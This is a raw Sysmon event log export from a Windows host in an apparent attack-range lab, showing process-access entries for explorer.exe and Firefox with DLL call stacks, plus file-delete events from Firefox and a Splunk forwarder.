16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a3000|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000002240924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a2ae1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.607{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF14ad925b.TMPMD5=447276F599C30177A0EA9A030C30E4DB,SHA256=DE114614183613CEDB27E92C354B8C848839AA92A117B7A9EF86F646C68FF426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E79D53342A52067F4755A3FE5201F5F0,SHA256=615080FFD821BABE5CF88BE75DAB112897F43A728542E4251965577DFA45F6D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.311{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002241728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:30.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A0BC04AE6A2B19482A734362FE6D266,SHA256=4407E00161EBAAA56FE6A9DAF521E1C8517EBE92A9230B6B89E0262DF2F12989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:30.357{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7942FB7463BA87EAC3AA69915DACD127,SHA256=F2E38E20EAC003DDCBCCF9A1371E0005634960B577D9AD3C3748F3B08947C83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:31.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9D3D5AE575A47ED05B9204C4322326CC,SHA256=3E5C01DE45C871FAC5B97747BCCA54582648990D8DA24CD3641799B3B7F44E9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 